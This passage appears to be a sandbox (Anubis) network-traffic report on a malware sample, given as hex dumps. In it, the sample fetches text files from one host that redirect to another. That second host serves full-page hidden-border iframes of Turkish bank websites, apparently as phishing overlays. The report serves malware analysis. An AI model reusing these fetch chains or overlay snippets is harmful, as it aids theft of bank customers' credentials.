7572 6564 200d 0a6e 6f74 2074 6f20 6469    ured ..not to di
7370 6c61 7920 696e 6c69 6e65 2066 7261    splay inline fra
6d65 732e 0d0a 3c2f 4946 5241 4d45 3e3c    mes...</IFRAME><
2f64 6976 3e                               /div>

from ANUBIS:1044 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 316 - Transferred inbound Bytes: 630

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6578    GET /img/jpg/yex
692e 7478 7420 4854 5450 2f31 2e31 0d0a    i.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3233 3a30 3720 474d 540d 0a41 6363    4:23:07 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3439 3331 6434    s..ETag: "4931d4
6231 3237 6463 3931 3a61 6439 6663 220d    b127dc91:ad9fc".
0a53 6572 7665 723a 204d 6963 726f 736f    .Server: Microso
6674 2d49 4953 2f36 2e30 0d0a 582d 506f    ft-IIS/6.0..X-Po
7765 7265 642d 4279 3a20 506c 6573 6b57    wered-By: PleskW
696e 0d0a 582d 506f 7765 7265 642d 4279    in..X-Powered-By
3a20 4153 502e 4e45 540d 0a44 6174 653a    : ASP.NET..Date:
2046 7269 2c20 3230 204d 6172 2032 3030     Fri, 20 Mar 200
3920 3131 3a30 313a 3237 2047 4d54 0d0a    9 11:01:27 GMT..
0d0a 6874 7470 3a2f 2f77 7777 2e6c 6164    ..http://www.lad
6573 3737 2e63 6f6d 2f69 6d61 6765 732f    es77.com/images/
6a73 2f79 6578 692e 7478 74                js/yexi.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6578    GET /img/jpg/yex
692e 7478 7420 4854 5450 2f31 2e31 0d0a    i.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3233 3a30 3720 474d 540d 0a41 6363    4:23:07 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3439 3331 6434    s..ETag: "4931d4
6231 3237 6463 3931 3a61 6439 6663 220d    b127dc91:ad9fc".
0a53 6572 7665 723a 204d 6963 726f 736f    .Server: Microso
6674 2d49 4953 2f36 2e30 0d0a 582d 506f    ft-IIS/6.0..X-Po
7765 7265 642d 4279 3a20 506c 6573 6b57    wered-By: PleskW
696e 0d0a 582d 506f 7765 7265 642d 4279    in..X-Powered-By
3a20 4153 502e 4e45 540d 0a44 6174 653a    : ASP.NET..Date:
2046 7269 2c20 3230 204d 6172 2032 3030     Fri, 20 Mar 200
3920 3131 3a30 313a 3238 2047 4d54 0d0a    9 11:01:28 GMT..
0d0a 6874 7470 3a2f 2f77 7777 2e6c 6164    ..http://www.lad
6573 3737 2e63 6f6d 2f69 6d61 6765 732f    es77.com/images/
6a73 2f79 6578 692e 7478 74                js/yexi.txt

from ANUBIS:1045 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 160 - Transferred inbound Bytes: 738

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
6578 692e 7478 7420 4854 5450 2f31 2e31    exi.txt HTTP/1.1
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
7465 7874 2f68 746d 6c0d 0a48 6f73 743a    text/html..Host:
2077 7777 2e6c 6164 6573 3737 2e63 6f6d     www.lades77.com
0d0a 4163 6365 7074 3a20 7465 7874 2f68    ..Accept: text/h
746d 6c2c 202a 2f2a 0d0a 5573 6572 2d41    tml, */*..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 332e    gent: Mozilla/3.
3020 2863 6f6d 7061 7469 626c 653b 2049    0 (compatible; I
6e64 7920 4c69 6272 6172 7929 0d0a 0d0a

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 313a 3239    ar 2009 11:01:29
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 343a 3030    an 2009 04:14:00
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3034 652d 3139 332d 3436 3131 6539 6535    04e-193-4611e9e5
3331 3230 3022 0d0a 4163 6365 7074 2d52    31200"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3430    ntent-Length: 40
330d 0a43 6f6e 7465 6e74 2d54 7970 653a    3..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
6578 696d 6261 6e6b 2e67 6f76 2e74 722f    eximbank.gov.tr/
696e 6465 782e 6874 6d22 200d 0a77 6964    index.htm" ..wid
7468 3d31 3030 250d 0a68 6569 6768 743d    th=100%..height=
3130 3025 2020 6d61 7267 696e 6865 6967    100%  marginheig
6874 3d22 3022 206d 6172 6769 6e77 6964    ht="0" marginwid
7468 3d22 3022 2020 7363 726f 6c6c 696e    th="0"  scrollin
673d 226e 6f22 200d 0a62 6f72 6465 723d    g="no" ..border=
2230 2220 0d0a 6672 616d 6562 6f72 6465    "0" ..frameborde
723d 2230 2220 0d0a 746f 703d 2230 2220    r="0" ..top="0" 
6c65 6674 3d22 3022 3e0d 0a59 6f75 7220    left="0">..Your 
6272 6f77 7365 7220 646f 6573 206e 6f74    browser does not
2073 7570 706f 7274 2069 6e6c 696e 6520     support inline 
6672 616d 6573 206f 7220 6973 2063 7572    frames or is cur
7265 6e74 6c79 2063 6f6e 6669 6775 7265    rently configure
6420 0d0a 6e6f 7420 746f 2064 6973 706c    d ..not to displ
6179 2069 6e6c 696e 6520 6672 616d 6573    ay inline frames
2e0d 0a3c 2f49 4652 414d 453e 3c2f 6469    ...</IFRAME></di
763e                                       v>

from ANUBIS:1046 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 316 - Transferred inbound Bytes: 632

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 616c    GET /img/jpg/yal
622e 7478 7420 4854 5450 2f31 2e31 0d0a    b.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3231 3a35 3420 474d 540d 0a41 6363    4:21:54 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3761 6332 3132    s..ETag: "7ac212
3166 3132 3764 6339 313a 6164 3966 6322    1f127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3031 3a32 3920 474d 540d    09 11:01:29 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7961 6c62 2e74 7874              /js/yalb.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 616c    GET /img/jpg/yal
622e 7478 7420 4854 5450 2f31 2e31 0d0a    b.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3231 3a35 3420 474d 540d 0a41 6363    4:21:54 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3761 6332 3132    s..ETag: "7ac212
3166 3132 3764 6339 313a 6164 3966 6322    1f127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3031 3a33 3020 474d 540d    09 11:01:30 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7961 6c62 2e74 7874              /js/yalb.txt

from ANUBIS:1047 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 160 - Transferred inbound Bytes: 744

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
616c 622e 7478 7420 4854 5450 2f31 2e31    alb.txt HTTP/1.1
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
7465 7874 2f68 746d 6c0d 0a48 6f73 743a    text/html..Host:
2077 7777 2e6c 6164 6573 3737 2e63 6f6d     www.lades77.com
0d0a 4163 6365 7074 3a20 7465 7874 2f68    ..Accept: text/h
746d 6c2c 202a 2f2a 0d0a 5573 6572 2d41    tml, */*..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 332e    gent: Mozilla/3.
3020 2863 6f6d 7061 7469 626c 653b 2049    0 (compatible; I
6e64 7920 4c69 6272 6172 7929 0d0a 0d0a

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 313a 3332    ar 2009 11:01:32
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 323a 3036    an 2009 04:12:06
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3034 352d 3139 392d 3436 3131 6539 3738    045-199-4611e978
3739 3138 3022 0d0a 4163 6365 7074 2d52    79180"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3430    ntent-Length: 40
390d 0a43 6f6e 7465 6e74 2d54 7970 653a    9..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
616c 6261 7261 6b61 7475 726b 2e63 6f6d    albarakaturk.com
2e74 722f 6465 6661 756c 742e 6173 7022    .tr/default.asp"
200d 0a77 6964 7468 3d31 3030 250d 0a68     ..width=100%..h
6569 6768 743d 3130 3025 2020 6d61 7267    eight=100%  marg
696e 6865 6967 6874 3d22 3022 206d 6172    inheight="0" mar
6769 6e77 6964 7468 3d22 3022 2020 7363    ginwidth="0"  sc
726f 6c6c 696e 673d 226e 6f22 200d 0a62    rolling="no" ..b
6f72 6465 723d 2230 2220 0d0a 6672 616d    order="0" ..fram
6562 6f72 6465 723d 2230 2220 0d0a 746f    eborder="0" ..to
703d 2230 2220 6c65 6674 3d22 3022 3e0d    p="0" left="0">.
0a59 6f75 7220 6272 6f77 7365 7220 646f    .Your browser do
6573 206e 6f74 2073 7570 706f 7274 2069    es not support i
6e6c 696e 6520 6672 616d 6573 206f 7220    nline frames or 
6973 2063 7572 7265 6e74 6c79 2063 6f6e    is currently con
6669 6775 7265 6420 0d0a 6e6f 7420 746f    figured ..not to
2064 6973 706c 6179 2069 6e6c 696e 6520     display inline 
6672 616d 6573 2e0d 0a3c 2f49 4652 414d    frames...</IFRAM
453e 3c2f 6469 763e                        E></div>

from ANUBIS:1048 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 316 - Transferred inbound Bytes: 632

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 7475    GET /img/jpg/ytu
662e 7478 7420 4854 5450 2f31 2e31 0d0a    f.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3234 3a32 3520 474d 540d 0a41 6363    4:24:25 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3130 3565 3461    s..ETag: "105e4a
3739 3132 3764 6339 313a 6164 3966 6322    79127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3031 3a33 3320 474d 540d    09 11:01:33 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7974 7566 2e74 7874              /js/ytuf.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 7475    GET /img/jpg/ytu
662e 7478 7420 4854 5450 2f31 2e31 0d0a    f.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3234 3a32 3520 474d 540d 0a41 6363    4:24:25 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3130 3565 3461    s..ETag: "105e4a
3739 3132 3764 6339 313a 6164 3966 6322    79127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3031 3a33 3420 474d 540d    09 11:01:34 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7974 7566 2e74 7874              /js/ytuf.txt

from ANUBIS:1049 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 160 - Transferred inbound Bytes: 748

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
7475 662e 7478 7420 4854 5450 2f31 2e31    tuf.txt HTTP/1.1
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
7465 7874 2f68 746d 6c0d 0a48 6f73 743a    text/html..Host:
2077 7777 2e6c 6164 6573 3737 2e63 6f6d     www.lades77.com
0d0a 4163 6365 7074 3a20 7465 7874 2f68    ..Accept: text/h
746d 6c2c 202a 2f2a 0d0a 5573 6572 2d41    tml, */*..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 332e    gent: Mozilla/3.
3020 2863 6f6d 7061 7469 626c 653b 2049    0 (compatible; I
6e64 7920 4c69 6272 6172 7929 0d0a 0d0a

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 313a 3335    ar 2009 11:01:35
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 363a 3137    an 2009 04:16:17
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3035 632d 3139 642d 3436 3131 6561 3637    05c-19d-4611ea67
6438 3634 3022 0d0a 4163 6365 7074 2d52    d8640"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3431    ntent-Length: 41
330d 0a43 6f6e 7465 6e74 2d54 7970 653a    3..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
7475 726b 6979 6566 696e 616e 732e 636f    turkiyefinans.co
6d2e 7472 2f74 722f 6465 6661 756c 742e    m.tr/tr/default.
6173 7022 200d 0a77 6964 7468 3d31 3030    asp" ..width=100
250d 0a68 6569 6768 743d 3130 3025 2020    %..height=100%  
6d61 7267 696e 6865 6967 6874 3d22 3022    marginheight="0"
206d 6172 6769 6e77 6964 7468 3d22 3022     marginwidth="0"
2020 7363 726f 6c6c 696e 673d 226e 6f22      scrolling="no"
200d 0a62 6f72 6465 723d 2230 2220 0d0a     ..border="0" ..
6672 616d 6562 6f72 6465 723d 2230 2220    frameborder="0" 
0d0a 746f 703d 2230 2220 6c65 6674 3d22    ..top="0" left="
3022 3e0d 0a59 6f75 7220 6272 6f77 7365    0">..Your browse
7220 646f 6573 206e 6f74 2073 7570 706f    r does not suppo
7274 2069 6e6c 696e 6520 6672 616d 6573    rt inline frames
206f 7220 6973 2063 7572 7265 6e74 6c79     or is currently
2063 6f6e 6669 6775 7265 6420 0d0a 6e6f     configured ..no
7420 746f 2064 6973 706c 6179 2069 6e6c    t to display inl
696e 6520 6672 616d 6573 2e0d 0a3c 2f49    ine frames...</I
4652 414d 453e 3c2f 6469 763e              FRAME></div>

from ANUBIS:1050 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 316 - Transferred inbound Bytes: 632

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6b75    GET /img/jpg/yku
762e 7478 7420 4854 5450 2f31 2e31 0d0a    v.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3233 3a35 3020 474d 540d 0a41 6363    4:23:50 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3161 3161 3564    s..ETag: "1a1a5d
3634 3132 3764 6339 313a 6164 3966 6322    64127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
